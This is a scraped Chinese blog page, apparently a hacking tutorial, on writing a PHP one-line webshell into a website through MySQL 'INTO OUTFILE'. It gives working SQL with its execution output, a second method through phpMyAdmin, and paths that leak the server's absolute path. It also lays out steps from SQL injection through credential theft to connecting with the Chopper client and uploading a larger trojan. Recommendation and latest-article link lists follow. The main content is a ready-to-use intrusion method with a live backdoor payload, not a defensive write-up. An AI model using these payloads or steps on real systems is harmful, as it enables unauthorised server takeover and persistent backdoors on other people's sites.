USEmysql;# MySQL 返回的查询结果为空(即零行)。

# MySQL 返回的查询结果为空(即零行)。CREATE TABLEa(

cmd1text NOT NULL);# MySQL 返回的查询结果为空(即零行)。

# MySQL 返回的查询结果为空(即零行)。INSERT INTOa( cmd1 )VALUES('<?php eval($_POST[cmd]);?>');# 影响列数:1# 影响列数:1

SELECTcmd1FROMaINTO OUTFILE '/data/www/heneng/cp/mm.php';# 影响列数: 1# 影响列数:1

DROP TABLE IF EXISTSa;# MySQL 返回的查询结果为空(即零行)。

# MySQL 返回的查询结果为空(即零行)。

1.首先通过注入获取mysql数据库的用户名和密码

2.通过相关渠道获取mysql数据库的路径

3.使用用户名和密码登陆mysql

4.获取网站可写目录的绝对路径

5.点击进入sql编辑器,输入上述代码,将一句话木马写入网站

6.使用菜刀连接一句话,上传大马

方法二:

使用phpmyadmin中的sql语句

写文件:

select '<?php @eval($_POST[1])?>' into outfile '/data/www/heneng/cp/log.php'

最后的/cp/log.php的文件名可以任意起的,不是固定的。

利用mysql数据库爆网站绝对路径方法

使用phpmyadmin的某个文件报错

phpmyadmin爆路径方法 weburl+phpmyadmin/themes/darkblue_orange/layout.inc.php

phpMyAdmin/libraries/select_lang.lib.php

参考:360搜索“mysql写入一句话木马文件”

mysql 一句话木马_通过mysql写入一句话木马相关推荐

  1. MySQL学习笔记_关于MySQL的字符类型VARCHAR长度知识总结

    MySQL学习笔记_关于MySQL的字符类型VARCHAR长度知识总结 一.VARCHAR存储和行长度限制 1.VARCHAR(N)中,N指的是字符的长度,VARCHAR类型最大支持65535,指的是 ...

  2. aspx连接mysql木马_让你变成ASP木马高手_安全教程_脚本之家

    1.名称:如何制作图片ASP木马 (可显示图片) 建一个asp文件,内容为 找一个正常图片ating.jpg,插入一句话木马(比如冰狐的),用ultraedit进行hex编译,插入图片里,为 了运行成 ...

  3. java一句话木马_如何使用JSP一句话木马和菜刀木马

    展开全部 相信用过一句话木马的黑阔们对中国32313133353236313431303231363533e4b893e5b19e31333337393033菜刀这个程序不会感到陌生,小弟也曾使用PH ...

  4. java读取mysql的图片_用JAVA写入和读取MYSQL的图片的实例

    主要的程序: package greeds.jdbc.sample; import greeds.jdbc.util.JDBCUtil; import java.io.*; import java.s ...

  5. 安装mysql出现错误_安装Mysql时出现错误及解决办法

    因为一时手痒痒更新了一下驱动,结果导致无线网卡出了问题.然而就算是从官网上下载了驱动各种折腾也没有弄好,心里特别堵.无奈只有重装系统这一条路了.这里表示特别难过,因为电脑上东西实在太多了,而且各种环境 ...

  6. mysql核心数据库_从MySQL基础进军MySQL核心架构 178集MySQL数据库核心基础视频教程 MySQL基础案例教程...

    从MySQL基础进军MySQL核心架构 178集MySQL数据库核心基础视频教程 MySQL基础案例教程 课程目录 (1) 01MySQL基础_课程引入.avi (2) 02MySQL基础_为什么学习 ...

  7. mysql 线程缓存_浅析MySQL内存的使用说明(全局缓存+线程缓存)

    首先我们来看一个公式,MySQL中内存分为全局内存和线程内存两大部分(其实并不全部,只是影响比较大的 部分): 复制代码 代码如下: per_thread_buffers=(read_buffer_s ...

  8. linux mysql依赖关系_[Linux]-MySQL主从复制

    MySQL支持的复制类型: 1) 基于语句的复制.在主服务器上执行的SQL语句,在从服务器上执行同样的语句.MySQL默认采用基于语句的复制,效率比较高: 2) 基于行的复制.把改变的内容复制过去,而 ...

  9. datax导入MySQL报错_导入MySQL方法对比

    使用datax导入 1.使用自增id 记录数 耗时(秒) TPS 4248882 347 12244 33404813 4038 8272 2.不使用自增id,使用雪花算法生成id后导入 记录数 耗时 ...

最新文章

  1. python压缩和解压缩
  2. 解决向数据库mysql插入double数据小数点不显示问题
  3. Java中普通字符串转json_java普通对象和json字符串的互转
  4. Visual Studio 11 Beta 带来新的Metro 应用开发体验
  5. xml格式是什么示例_什么是对抗示例?
  6. 网络/系统调试维护笔记
  7. map to javaBean
  8. DRBD安装配置、工作原理及故障恢复
  9. 中国古代道家思想与网页重构的思考
  10. 计算机学业水平测试网,学业水平测试
  11. Mac上好用且免费的远程桌面SSH工具(FinalShell)
  12. Unity Shader入门精要学习笔记 - 第11章 让画面动起来
  13. 求a的高次幂对b的余数
  14. 用Java实现后台统计图
  15. 半监督分类算法简述,self-trainning,co-trainning
  16. String 转表情, Swift 与 OC 中调用
  17. python解压zip文件_python怎样压缩和解压缩ZIP文件(转)
  18. 树莓派机器视觉环境搭建
  19. M1芯片完美运行安卓模拟器,简单无坑
  20. Matlab实现Holland风场

热门文章

  1. MySQL中的存储过程(详细篇)
  2. linux 邮件服务器pop3,linux下的邮件服务器
  3. uniapp编写tab选项卡
  4. Windows系统补丁管理工具
  5. java中string转object_java中Object转String
  6. JS——事件冒泡与阻止事件冒泡
  7. HDMI接口类型及历史版本
  8. HTML Form 传值
  9. Java学习路线-43:JDBC数据库开发入门
  10. 数据库中间件 Cetus 2.3.6 读写分离版